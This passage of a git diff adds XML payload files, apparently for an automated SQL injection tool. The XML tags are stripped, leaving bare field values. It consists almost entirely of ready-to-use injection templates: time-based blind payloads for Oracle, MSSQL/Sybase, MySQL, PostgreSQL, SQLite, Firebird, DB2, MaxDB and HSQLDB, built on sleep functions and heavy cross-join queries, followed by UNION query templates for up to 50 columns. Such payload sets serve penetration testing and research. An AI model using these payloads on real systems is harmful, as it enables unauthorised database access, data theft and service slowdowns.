+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+
+ Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)
+ 5
+ 3
+ 0
+ 1,3
+ 3
+ BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
+
+ BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)
+ 5
+ 3
+ 1
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle time-based blind - Parameter replace (heavy queries)
+ 5
+ 4
+ 2
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+
+
+ SQLite > 2.0 time-based blind - Parameter replace (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))
+
+ (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))
+
+
+
+
+
+ SQLite
+ > 2.0
+
+
+
+
+ Firebird time-based blind - Parameter replace (heavy query)
+ 5
+ 5
+ 2
+ 1,2,3
+ 3
+ IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
+
+ (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
+
+
+
+
+
+ Firebird
+ >= 2.0
+
+
+
+
+ SAP MaxDB time-based blind - Parameter replace (heavy query)
+ 5
+ 5
+ 2
+ 1,3
+ 3
+ (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
+
+ (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
+
+
+
+
+
+ SAP MaxDB
+
+
+
+
+ IBM DB2 time-based blind - Parameter replace (heavy query)
+ 5
+ 5
+ 2
+ 1,2,3
+ 3
+ (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
+
+ (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
+
+
+
+
+
+ IBM DB2
+
+
+
+
+
+ HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+
+
+
+ MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+
+
+
+
+ MySQL
+ >= 5.0.11
+
+
+
+
+ MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+
+
+
+
+ MySQL
+
+
+
+
+ PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)
+ 5
+ 3
+ 0
+ 2,3
+ 1
+ ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
+
+ ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+
+
+
+ Oracle
+
+
+
+
+ HSQLDB >= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB > 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
+ 5
+ 4
+ 2
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+
diff --git a/xml/payloads/06_union_query.xml b/xml/payloads/06_union_query.xml
new file mode 100644
index 000000000..a3ec3f4b1
--- /dev/null
+++ b/xml/payloads/06_union_query.xml
@@ -0,0 +1,742 @@
+
+
+
+
+
+ MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 1-10
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 1-10
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 1 to 10 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 1-10
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 11-20
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 11-20
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 11 to 20 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 11-20
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 21-30
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 21-30
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 21 to 30 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 21-30
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 31-40
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 31-40
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 31 to 40 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 31-40
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([CHAR]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [CHAR]
+ 41-50
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query (NULL) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ NULL
+ 41-50
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL UNION query ([RANDNUM]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ #
+ [RANDNUM]
+ 41-50
+
+
+
+
+
+ MySQL
+
+
+
+
+ Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 1-10
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 1-10
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 1 to 10 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 1-10
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 11-20
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 11-20
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 11 to 20 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 11-20
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 21-30
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 21-30
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 21 to 30 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 21-30
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 31-40
+
+
+
+
+
+
+
+ Generic UNION query (NULL) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 31-40
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 31 to 40 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 31-40
+
+
+
+
+
+
+
+ Generic UNION query ([CHAR]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [CHAR]
+ 41-50
+
+
+
+
+
+
+ Generic UNION query (NULL) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ NULL
+ 41-50
+
+
+
+
+
+
+
+ Generic UNION query ([RANDNUM]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ --
+ [RANDNUM]
+ 41-50
+
+
+
+
+
+
+